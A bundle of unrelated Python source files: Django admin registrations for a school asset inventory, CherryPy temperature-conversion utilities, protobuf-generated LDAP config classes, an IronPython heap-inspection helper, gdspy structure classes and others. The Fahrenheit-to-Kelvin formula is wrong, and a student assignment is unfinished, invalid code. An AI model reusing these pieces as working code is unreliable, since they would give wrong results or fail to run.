def get_queryset(self, request):
qs_id_sub_skpd=105
peralatan_mesin_qs = PeralatanMesin.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd)
return self.model.objects.filter(id_peralatan_mesin__in=peralatan_mesin_qs)
###Register PeralatanMesin DisdikSMPN2Halong
admin.site.register(PeralatanMesinDisdikSMPN2Halong, PeralatanMesinDisdikSMPN2HalongAdmin)
admin.site.register(HargaPeralatanMesinDisdikSMPN2Halong, HargaPeralatanMesinDisdikSMPN2HalongAdmin)
#### Jalan, Irigasi, dan Jaringan
from jalanirigasijaringan.models import KontrakJalanIrigasiJaringan, HargaJalanIrigasiJaringan, JalanIrigasiJaringan, PenghapusanJalanIrigasiJaringan, PemanfaatanJalanIrigasiJaringan, TahunBerkurangJalanIrigasiJaringan
from jalanirigasijaringan.models import JalanIrigasiJaringanPemanfaatan, JalanIrigasiJaringanPenghapusan
from jalanirigasijaringan.models import JalanIrigasiJaringanDisdikSMPN2Halong, HargaJalanIrigasiJaringanDisdikSMPN2Halong
from jalanirigasijaringan.admin import HargaJalanIrigasiJaringanInline, JalanIrigasiJaringanAdmin, KontrakJalanIrigasiJaringanAdmin, HargaJalanIrigasiJaringanAdmin
#### Class Jalan, Irigasi dan Jaringan
class HargaJalanIrigasiJaringanDisdikSMPN2HalongInline(HargaJalanIrigasiJaringanInline):
model = HargaJalanIrigasiJaringanDisdikSMPN2Halong
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "id_kontrak_jalan_irigasi_jaringan":
kwargs["queryset"] = KontrakJalanIrigasiJaringan.objects.filter(id_skpd__exact=7)
return super(HargaJalanIrigasiJaringanDisdikSMPN2HalongInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
class JalanIrigasiJaringanDisdikSMPN2HalongAdmin(JalanIrigasiJaringanAdmin):
inlines = [HargaJalanIrigasiJaringanDisdikSMPN2HalongInline]
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "id_sub_skpd":
qs_id_sub_skpd=105
kwargs["queryset"] = SUBSKPD.objects.filter(id__exact=qs_id_sub_skpd)
return super(JalanIrigasiJaringanDisdikSMPN2HalongAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)
def get_queryset(self, request):
qs_id_sub_skpd=105
return self.model.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd).filter(id_golongan_barang__exact=4).filter(id_mutasi_berkurang__exact=5)
class HargaJalanIrigasiJaringanDisdikSMPN2HalongAdmin(HargaJalanIrigasiJaringanAdmin):
def get_queryset(self, request):
qs_id_sub_skpd=105
jalan_irigasi_jaringan_qs = JalanIrigasiJaringan.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd)
return self.model.objects.filter(id_jalan_irigasi_jaringan__in=jalan_irigasi_jaringan_qs)
###Register JalanIrigasiJaringan DisdikSMPN2Halong
admin.site.register(JalanIrigasiJaringanDisdikSMPN2Halong, JalanIrigasiJaringanDisdikSMPN2HalongAdmin)
admin.site.register(HargaJalanIrigasiJaringanDisdikSMPN2Halong, HargaJalanIrigasiJaringanDisdikSMPN2HalongAdmin)
#### Aset Tetap Lainnya
from atl.models import KontrakATL, HargaATL, ATL, PenghapusanATL, PemanfaatanATL, TahunBerkurangATL, TahunBerkurangUsulHapusATL
from atl.models import ATLPemanfaatan, ATLPenghapusan
from atl.models import ATLDisdikSMPN2Halong, HargaATLDisdikSMPN2Halong
from atl.admin import HargaATLInline, ATLAdmin, KontrakATLAdmin, HargaATLAdmin
#### Class Aset Tetap Lainnya
class HargaATLDisdikSMPN2HalongInline(HargaATLInline):
model = HargaATLDisdikSMPN2Halong
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "id_kontrak_atl":
kwargs["queryset"] = KontrakATL.objects.filter(id_skpd__exact=7)
return super(HargaATLDisdikSMPN2HalongInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
class ATLDisdikSMPN2HalongAdmin(ATLAdmin):
inlines = [HargaATLDisdikSMPN2HalongInline]
def formfield_for_foreignkey(self, db_field, request, **kwargs):
if db_field.name == "id_sub_skpd":
qs_id_sub_skpd=105
kwargs["queryset"] = SUBSKPD.objects.filter(id__exact=qs_id_sub_skpd)
if db_field.name == "id_ruangan":
qs_id_sub_skpd=105
kwargs["queryset"] = Ruangan.objects.filter(id_gedung_bangunan__id_sub_skpd__exact=qs_id_sub_skpd)
return super(ATLDisdikSMPN2HalongAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)
def get_queryset(self, request):
qs_id_sub_skpd=105
return self.model.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd).filter(id_mutasi_berkurang__exact=5)
class HargaATLDisdikSMPN2HalongAdmin(HargaATLAdmin):
def get_queryset(self, request):
qs_id_sub_skpd=105
atl_qs = ATL.objects.filter(id_sub_skpd__exact=qs_id_sub_skpd)
return self.model.objects.filter(id_atl__in=atl_qs)
###Register ATL DisdikSMPN2Halong
admin.site.register(ATLDisdikSMPN2Halong, ATLDisdikSMPN2HalongAdmin)
admin.site.register(HargaATLDisdikSMPN2Halong, HargaATLDisdikSMPN2HalongAdmin)
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_user import UserManager
app = Flask(__name__, static_folder="static")
app.config.from_object("config")
db = SQLAlchemy(app)
# These imports need to come after the app is instantiated
from deplatformr.views import views, facebook_views, filecoin_views
from deplatformr.models import user_models, filecoin_models
# Setup Flask-User and specify the User data-model
user_manager = UserManager(app, db, user_models.User)
|
#!/usr/bin/env python3
"""
Utils for the converter API
:author: Angelo Cutaia, Claudio Tancredi
:copyright: Copyright 2020, Angelo Cutaia, Claudio Tancredi
..
Copyright 2020 Angelo Cutaia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard Library
from typing import Callable, Dict
# Third party
import cherrypy
# ------------------------------------------------------------------------------------------
######################
# UTILITY FUNCTIONS #
######################
def celsius(value: float, target_unit: str) -> float:
"""
Utility function for Celsius conversion in Kelvin or in Fahrenheit
:param value: temperature
:param target_unit: Celsius, Kelvin or Fahrenheit
:return: value converted in the right scale
"""
if target_unit == "K":
# Convert in Kelvin scale
return value + 273.15
else:
# Convert in Fahrenheit scale
return value * 1.8 + 32
def fahrenheit(value: float, target_unit: str) -> float:
"""
Utility function for Fahrenheit conversion in Celsius or in Kelvin
:param value: temperature
:param target_unit: Celsius, Kelvin or Fahrenheit
:return: value converted in the right scale
"""
if target_unit == "C":
# Convert in Celsius scale
return (value - 32) / 1.8
else:
# Convert in Kelvin scale
return (value - 32) / 1 - 8 + 273.15
def kelvin(value: float, target_unit: str) -> float:
"""
Utility function for Kelvin conversion in Celsius or in Fahrenheit
:param value: temperature
:param target_unit: Celsius, Kelvin or Fahrenheit
:return: value converted in the right scale
"""
if target_unit == "C":
# Convert in Celsius
return value - 273.15
else:
# Convert in Fahrenheit
return (value - 273.15) * 1.8 + 32
# ---------------------------------------------------------------------------------------------
#################
# UTILITY CLASS #
#################
class ConverterUtils:
"""
Class that handles the conversion of temperature values in the requested scales.
This class doesn't have an __init__(self).
It will be used only as an interface to perform the conversion, so it won't be instantiated.
To do that it uses the classmethod conversion, and the immutable class attributes:
* _supported_scale
* _absolute_zero
* _conversion
"""
_supported_scales = ("C", "F", "K")
"""Set of supported scales"""
_absolute_zero = {
"C": -273.15,
"F": -459.67,
"K": 0.0
}
"""Association between a scale and the respective absolute zero"""
_conversion: Dict[str, Callable[[float, str], float]] = {
"C": celsius,
"F": fahrenheit,
"K": kelvin
}
"""Association between a scale and a converter function"""
@classmethod
def conversion(cls, value: float, original_unit: str, target_unit: str) -> float:
"""
Analyze the value to convert and the scale to use.
In case of error raise an HTTP exception to tell the client that the request has some errors.
:param value: temperature
:param original_unit: Celsius, Kelvin or Fahrenheit
:param target_unit: Celsius, Kelvin or Fahrenheit
:return: value converted in the right scale
"""
# Check if the scales are supported
if original_unit not in cls._supported_scales:
raise cherrypy.HTTPError(
status=422,
message=f"Original unit {original_unit} isn't in the supported scales: {cls._supported_scales}"
)
if target_unit not in cls._supported_scales:
raise cherrypy.HTTPError(
status=422,
message=f"Target unit {target_unit} isn't in the supported scales: {cls._supported_scales}"
)
# Check if the scales aren't equal
if original_unit == target_unit:
raise cherrypy.HTTPError(
status=409,
message="Impossible to convert cause the original_unit scale coincide with the target_unit scale"
)
# Check if the original unit value is coherent with original unit absolute zero
if cls._absolute_zero[original_unit] > value:
raise cherrypy.HTTPError(
status=409,
message=f"Original value ({value} {original_unit}) lower than absolute zero "
f"({cls._absolute_zero[original_unit]} {original_unit})."
)
# Return the converted value
return cls._conversion[original_unit](value, target_unit)
|
from distutils.core import setup
setup(
name='kmertools',
version='0.1.0',
author='Simone Longo',
author_email='s.longo@utah.edu',
packages=['kmertools'],
license='LICENSE.txt',
description='Tools for processing VCF files in parallel in addition to k-mer search and analysis',
long_description=open('README.rst').read(),
install_requires=[
"pyfaidx",
"cyvcf2",
"pandas",
"numpy",
"pytabix",
],
)
|
import cadquery as cq
from wing_utils import show
result = cq.Workplane("front").ellipse(2, 4).extrude(2).shell(-1.5)
show(result)
|
# Dasean Volk, dvolk@usc.edu
# ITP 115, Fall 2021
# # Section: Boba
# Assignment 4
# Description: a program that allows the user to enter an unknown amount of numbers. The
# user will signal that they are done entering numbers by entering -1. The program will
# determine the smallest number entered and largest number entered by using variables
# and branching.
# variables that will hold the smallest number, largest number, count,
# sum, and the number the user will enter
user = " "
count = 0
sum = 0
# create do while loop first,set variables
while
# displays instruction to user
print("\nInput an integer greater than or equal to 0 (-1 to quit):")
# while loop that ends when the user enters a -1, getting input with a >
while user != -1:
user = int(input("> "))
if count == 0:
smallNum = user
largeNum = user
else:
if user > largeNum:
largeNum = user
elif user < smallNum:
smallNum = user
sum = sum + user
count = count + 1
print(sum)
print(count)
again = input("Would you like to enter another set of numbers (y/n)?")
if again == "y" or again == "Y":
else:
print("Goodbye!")
#NEED TO FIND AVERAGE AND PRINT, CREATE DO WHILE LOOP
|
from itertools import permutations
import numpy as np
import pytest
import torch
from test_types import image_av_chunk # noqa
from mohou.encoder import ImageEncoder, VectorIdenticalEncoder
from mohou.encoding_rule import ElemCovMatchPostProcessor, EncodingRule
from mohou.types import AngleVector, RGBDImage, RGBImage, TerminateFlag, VectorBase
def test_ElemCovMatchPostProcessor():
dim1 = 2
dim2 = 3
bias = 10
a = np.random.randn(100000, dim1) + np.ones(2) * bias
b = np.random.randn(100000, dim2)
b[:, 0] *= 3
b[:, 1] *= 2
b[:, 2] *= 0.5
c = np.concatenate([a, b], axis=1)
normalizer = ElemCovMatchPostProcessor.from_feature_seqs(c, [dim1, dim2])
inp = np.random.randn(5)
normalized = normalizer.apply(inp)
denormalized = normalizer.inverse_apply(normalized)
np.testing.assert_almost_equal(inp, denormalized, decimal=2)
cstds = normalizer.characteristic_stds
np.testing.assert_almost_equal(cstds, np.array([1.0, 3.0]), decimal=1)
scaled_cstds = normalizer.scaled_characteristic_stds
np.testing.assert_almost_equal(scaled_cstds, np.array([1.0 / 3.0, 1.0]), decimal=2)
def test_encoding_rule(image_av_chunk): # noqa
chunk = image_av_chunk
n_image_encoded = 5
n_av_encoded = 10
f1 = ImageEncoder(
RGBImage,
lambda img: torch.zeros(n_image_encoded),
lambda vec: torch.zeros(3, 100, 100),
(100, 100, 3),
n_image_encoded,
)
f2 = VectorIdenticalEncoder(AngleVector, n_av_encoded)
f3 = VectorIdenticalEncoder(TerminateFlag, 1)
rule = EncodingRule.from_encoders([f1, f2, f3], chunk=chunk)
vector_seq_list = rule.apply_to_multi_episode_chunk(chunk)
vector_seq = vector_seq_list[0]
assert vector_seq.shape == (10, n_image_encoded + n_av_encoded + 1)
class Dummy(VectorBase):
pass
# Check dict insertion oreder is preserved
# NOTE: from 3.7, order is preserved as lang. spec.
# NOTE: from 3.6, order is preserved in a cpython implementation
f3 = VectorIdenticalEncoder(TerminateFlag, 1)
f4 = VectorIdenticalEncoder(Dummy, 2)
pairs = [(f1, RGBImage), (f2, AngleVector), (f3, TerminateFlag), (f4, Dummy)]
for pairs_perm in permutations(pairs, 4):
fs = [p[0] for p in pairs_perm]
ts = [p[1] for p in pairs_perm]
rule = EncodingRule.from_encoders(fs)
assert list(rule.keys()) == ts
def test_encoding_rule_assertion(image_av_chunk): # noqa
chunk = image_av_chunk
n_image_encoded = 5
n_av_encoded = 10
f1 = ImageEncoder(
RGBDImage,
lambda img: torch.zeros(n_image_encoded),
lambda vec: torch.zeros(4, 100, 100),
(100, 100, 4),
n_image_encoded,
)
f2 = VectorIdenticalEncoder(AngleVector, n_av_encoded)
rule = EncodingRule.from_encoders([f1, f2])
with pytest.raises(AssertionError):
rule.apply_to_multi_episode_chunk(chunk)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: config.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='config.proto',
package='ldap',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x0c\x63onfig.proto\x12\x04ldap\x1a\x1bgoogle/protobuf/empty.proto\"\xd5\x01\n\rConfigRequest\x12\x0b\n\x03key\x18\x01 \x01(\t\x12&\n\x04\x63onf\x18\x02 \x01(\x0b\x32\x18.ldap.ConfigRequest.Conf\x1a\x8e\x01\n\x04\x43onf\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x16\n\x0euser_search_dn\x18\x02 \x01(\t\x12\x13\n\x0buser_filter\x18\x03 \x01(\t\x12\x12\n\nmanager_dn\x18\x04 \x01(\t\x12\x18\n\x10manager_password\x18\x05 \x01(\t\x12\x10\n\x08username\x18\x06 \x01(\t\x12\x0b\n\x03org\x18\x07 \x01(\x05\"o\n\x15\x43onfigResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12$\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32\x16.google.protobuf.Emptyb\x06proto3')
,
dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,])
_CONFIGREQUEST_CONF = _descriptor.Descriptor(
name='Conf',
full_name='ldap.ConfigRequest.Conf',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='ldap.ConfigRequest.Conf.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='user_search_dn', full_name='ldap.ConfigRequest.Conf.user_search_dn', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='user_filter', full_name='ldap.ConfigRequest.Conf.user_filter', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='manager_dn', full_name='ldap.ConfigRequest.Conf.manager_dn', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='manager_password', full_name='ldap.ConfigRequest.Conf.manager_password', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='username', full_name='ldap.ConfigRequest.Conf.username', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='org', full_name='ldap.ConfigRequest.Conf.org', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=123,
serialized_end=265,
)
_CONFIGREQUEST = _descriptor.Descriptor(
name='ConfigRequest',
full_name='ldap.ConfigRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='ldap.ConfigRequest.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='conf', full_name='ldap.ConfigRequest.conf', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CONFIGREQUEST_CONF, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=52,
serialized_end=265,
)
_CONFIGRESPONSEWRAPPER = _descriptor.Descriptor(
name='ConfigResponseWrapper',
full_name='ldap.ConfigResponseWrapper',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='ldap.ConfigResponseWrapper.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='codeExplain', full_name='ldap.ConfigResponseWrapper.codeExplain', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='ldap.ConfigResponseWrapper.error', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='ldap.ConfigResponseWrapper.data', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=267,
serialized_end=378,
)
_CONFIGREQUEST_CONF.containing_type = _CONFIGREQUEST
_CONFIGREQUEST.fields_by_name['conf'].message_type = _CONFIGREQUEST_CONF
_CONFIGRESPONSEWRAPPER.fields_by_name['data'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
DESCRIPTOR.message_types_by_name['ConfigRequest'] = _CONFIGREQUEST
DESCRIPTOR.message_types_by_name['ConfigResponseWrapper'] = _CONFIGRESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ConfigRequest = _reflection.GeneratedProtocolMessageType('ConfigRequest', (_message.Message,), {
'Conf' : _reflection.GeneratedProtocolMessageType('Conf', (_message.Message,), {
'DESCRIPTOR' : _CONFIGREQUEST_CONF,
'__module__' : 'config_pb2'
# @@protoc_insertion_point(class_scope:ldap.ConfigRequest.Conf)
})
,
'DESCRIPTOR' : _CONFIGREQUEST,
'__module__' : 'config_pb2'
# @@protoc_insertion_point(class_scope:ldap.ConfigRequest)
})
_sym_db.RegisterMessage(ConfigRequest)
_sym_db.RegisterMessage(ConfigRequest.Conf)
ConfigResponseWrapper = _reflection.GeneratedProtocolMessageType('ConfigResponseWrapper', (_message.Message,), {
'DESCRIPTOR' : _CONFIGRESPONSEWRAPPER,
'__module__' : 'config_pb2'
# @@protoc_insertion_point(class_scope:ldap.ConfigResponseWrapper)
})
_sym_db.RegisterMessage(ConfigResponseWrapper)
# @@protoc_insertion_point(module_scope)
|
__author__ = 'Radoslaw Matusiak'
__copyright__ = 'Copyright (c) 2017 Radoslaw Matusiak'
__license__ = 'MIT'
__version__ = '0.1'
import clr
import imp
import os
import sys
import tempfile
MANAGED_HEAPS = [] # List of tupples (start_address, stop_address, details) describing managed heaps
def on_load():
"""
Execute when module is imported.
"""
print '[+] Loading Ishtar script'
print '[+] PID: {0}'.format(os.getpid())
print '[+] Current workin directory: {0}'.format(os.getcwd())
# end-of-function on_load
on_load()
def test_objects():
import clr
clr.AddReference('System')
import System
t = System.String('test')
t_ptr = Objects.GetObjectAddress(t)
x = Objects.GetInstance(t_ptr, Objects.CLR_VERSION.VER_4_0)
# end-of-function test
def run_vmmap(vmmap):
"""
Run vmmap and fill MANAGED_HEAPS variable.
Arguments:
vmmap -- Full path to vmmap.exe.
Returns: None.
"""
if os.path.isfile(vmmap):
print '[+] Running vmmap...'
pid = os.getpid()
vmmap_csv = os.path.join(os.getcwd(), 'vmmap.csv')
os.system('{0} -p {1} {2}'.format(vmmap, pid, vmmap_csv))
print '[+] Parsing vmmap output...'
parse_vmmap_file(vmmap_csv)
print '[+] Cleaning...'
os.remove(vmmap_csv)
print '[+] Done!'
else:
print '[!] {} not a file.'.format(vmmap)
# end-of-function run_vmmap
def parse_vmmap_file(vmmap_csv):
"""
Use vmmap report to find all managed heaps and fill global MANAGED_HEAPS list.
Arguments:
vmmap_csv -- Full path to vmmap output CSV file.
Returns: None.
"""
global MANAGED_HEAPS
with open(vmmap_csv, 'r') as fh:
for l in fh.readlines():
# Look for *NOT RESERVED*, *MANAGED HEAP* fragments
if 'Managed Heap' in l and l.startswith('" ') and 'Reserved' not in l and len(l) > 0:
# Clean up line
l = l.replace('\xa0', '')
l = l.replace('"', '').strip()
tokens = l.split(',')
# Find relevant tokens
start = int(tokens[0].replace('"', ''), 16)
size = tokens[2].replace('"', '')
if 'bytes' in size:
size = int(size.replace(' bytes', '')) # vmmap reports are soo human redable
else:
size = int(size) * 1024 # Size in KB
# Update list with tupple (start_address, stop_address, details)
MANAGED_HEAPS.append( (start, start + size, tokens[-1]) )
# end-of-function managed_heaps
def clr_import(module_name):
"""Add reference to managed module and import it.
Arguments:
module_name -- Managed module name.
Returns: None.
"""
clr.AddReference(module_name)
imp.load_module(module_name, *imp.find_module(module_name))
# end-of-function clr_import
if __name__ == '__main__':
pass |
class Ultimo(object):
""" Class for keeping info about latest available programs """
def __init__(self, url, tapa, nombre, nombre_programa, fecha, id, id_programa):
self.url = url
self.tapa = tapa
self.nombre = nombre
self.nombre_programa = nombre_programa
self.fecha = fecha
self.id = id
self.id_programa = id_programa
def str(self):
return "({}){}".format(self.id, self.nombre)
def from_json(dct):
return Ultimo(dct['url'], dct['tapa'], dct['nombre'], dct['nombre_programa'], dct['fecha'], dct['id'], dct['id_programa']) |
import re
from enum import Enum
from typing import Dict
import libkol
from .request import Request
class QuestPage(Enum):
Current = 1
Completed = 2
Accomplishments = 3
Notes = 4
HoboCode = 5
MonsterManuel = 6
quests_completed_pattern = re.compile(
r"<b>([\w\s,\.\'\?!]+)<\/b>(?!<\/td>)<br>([\w\s,\.\'\?!]+)<p>"
)
class questlog(Request):
"""
Get info from the quest log about which quests are completed and which stage of each uncompleted quest the player is on
:param page: Page of the quest log to request
"""
def __init__(
self, session: "libkol.Session", page: QuestPage = QuestPage.Current
) -> None:
params = {"which": page.value}
self.request = session.request("questlog.php", params=params)
@staticmethod
async def parser(content: str, **kwargs) -> Dict[str, str]:
return {
match.group(1): match.group(2)
for match in quests_completed_pattern.finditer(content)
}
|
# Import third-party modules
from vendor.Qt import QtWidgets
# Import local modules
import scriptsmenu
def _mari_main_window():
"""Get Mari main window.
Returns:
MriMainWindow: Mari's main window.
"""
for obj in QtWidgets.QApplication.topLevelWidgets():
if obj.metaObject().className() == 'MriMainWindow':
return obj
raise RuntimeError('Could not find Mari MainWindow instance')
def _mari_main_menubar():
"""Get Mari main menu bar.
Returns:
Retrieve the main menubar of the Mari window.
"""
mari_window = _mari_main_window()
menubar = [
i for i in mari_window.children() if isinstance(i, QtWidgets.QMenuBar)
]
assert len(menubar) == 1, "Error, could not find menu bar!"
return menubar[0]
def main(title="Scripts"):
"""Build the main scripts menu in Mari.
Args:
title (str): Name of the menu in the application.
Returns:
scriptsmenu.ScriptsMenu: Instance object.
"""
mari_main_bar = _mari_main_menubar()
for mari_bar in mari_main_bar.children():
if isinstance(mari_bar, scriptsmenu.ScriptsMenu):
if mari_bar.title() == title:
menu = mari_bar
return menu
menu = scriptsmenu.ScriptsMenu(title=title, parent=mari_main_bar)
return menu
|
import copy
import gdspy
import numpy as np
from operator import add, sub
from recordclass import recordclass
import gds_tools as gtools
class GDStructure:
def __init__(self, structure, endpoints, endpoint_dims, endpoint_directions = None, method = None, args = {}):
"""Define class to store structures in
Args:
structure (gdspy.Path()): gdspy description of object (i.e. ouput of gdspy.PolyPath()).
endpoints (dict): positions of the endpoints to which you connect other structures.
endpoint_dims (dict): dimensions of the endpoints (width/height/etc.), to be used for connecting e.g. transmission lines.
endpoint_directions ([type], optional): [description]. Defaults to None.
method ([type], optional): [description]. Defaults to None.
args (dict, optional): [description]. Defaults to {}.
"""
self.type = 'GDStructure'
self.structure = structure
self.endpoints = endpoints
self.endpoint_dims = endpoint_dims
self.endpoint_directions = endpoint_directions
self.compound = []
self.prev = {}
self.next = {}
self.method = method
self.__args_tuple__ = recordclass('args', args.keys())
self.args = self.__args_tuple__(**args)
self.gen = self.generate
def generate(self):
if self.method != None:
return self.method(**self.args.__dict__)
else:
raise TypeError('This GDStructure does not support the .generate() method (yet)')
def copy(self):
"""Makes a new copy of the structure,
i.e. allocates new memory and copies the data contents to it.
Returns:
gds_tools.GDStructure: pointer of copy of original
"""
# Create deepcopy of self and return the copy
# Do not copy.deepcopy(self) directly, as this will also copy the connections and screw things up
# Instead, just fill a new instance of the class with copies of relevant internal structure
new_obj = gtools.classes.GDStructure(copy.deepcopy(self.structure), copy.deepcopy(self.endpoints), copy.deepcopy(self.endpoint_dims), copy.deepcopy(self.endpoint_directions))
compound = []
for i, c in enumerate(self.compound):
c_copy = c.copy()
compound.append(c_copy)
new_obj.next[i] = c_copy
new_obj.compound = compound
return new_obj
#==================
# Rotate structure \\
#=========================================================================
# When rotating, all endpoints need to move wih the rotation, ||
# for this reason we need our own rotation function. ||
# ||
# Arguments: rad : amount of radians to rotate ||
# signal_from : tells linked structure who sent command ||
#=========================================================================
def rotate(self, rad, signal_from = None):
if not isinstance(signal_from, list):
signal_from = [signal_from]
# Rotate the structure with standard gdspy .rotation() function
if self not in signal_from:
signal_from.append(self)
self.structure.rotate(rad)
# Rotate the endpoints
for i in self.endpoints:
self.endpoints[i] = tuple(gtools.funcs.VecRot(rad, self.endpoints[i]))
if self.endpoint_directions:
self.endpoint_directions[i] += rad
# Rotate all connected structures
for i in self.prev:
if self.prev[i] not in signal_from and self.prev:
signal_from.append(self.prev[i])
self.prev[i].rotate(rad, signal_from = signal_from)
for i in self.next:
if self.next[i] not in signal_from and self.next:
signal_from.append(self.next[i])
self.next[i].rotate(rad, signal_from = signal_from)
return self
#=====================
# Get structure layer \\
#=========================================================================
# Gdspy has some inconsistencies in how it stores layers, this getter ||
# function should make life easier to obtain the layer of the object ||
# stored in self.structure ||
#=========================================================================
def getlayer(self):
return self.structure.layers[0] if hasattr(self.structure, 'layers') else (self.structure.layer if hasattr(self.structure, 'layer') else 0)
#=====================
# Translate structure \\
#=========================================================================
# Arguments: delta : vector (x, y) how much you want to move ||
# signal_from : tells linked structure who sent command ||
#=========================================================================
def translate(self, delta, signal_from = None):
if not isinstance(signal_from, list):
signal_from = [signal_from]
# Translate structure with standard gdspy .translate() function
if self not in signal_from:
signal_from.append(self)
self.structure.translate(delta[0], delta[1])
# Translate all the endpoints
for i in self.endpoints:
self.endpoints[i] = tuple(map(add, self.endpoints[i], delta))
# Translate all connected structures
for i in self.prev:
if self.prev[i] not in signal_from and self.prev:
signal_from.append(self.prev[i])
self.prev[i].translate(delta, signal_from = signal_from)
for i in self.next:
if self.next[i] not in signal_from and self.next:
signal_from.append(self.next[i])
self.next[i].translate(delta, signal_from = signal_from)
return self
#=====================
# Mirror structure \\
#=========================================================================
# Arguments: p1, p2 : p1 and p2 are (x, y) coords forming ||
# the mirror line ||
#=========================================================================
def mirror(self, p1, p2, signal_from = None):
if not isinstance(signal_from, list):
signal_from = [signal_from]
# Mirror the gdspy shape
if self not in signal_from:
signal_from.append(self)
self.structure.mirror(p1, p2 = p2)
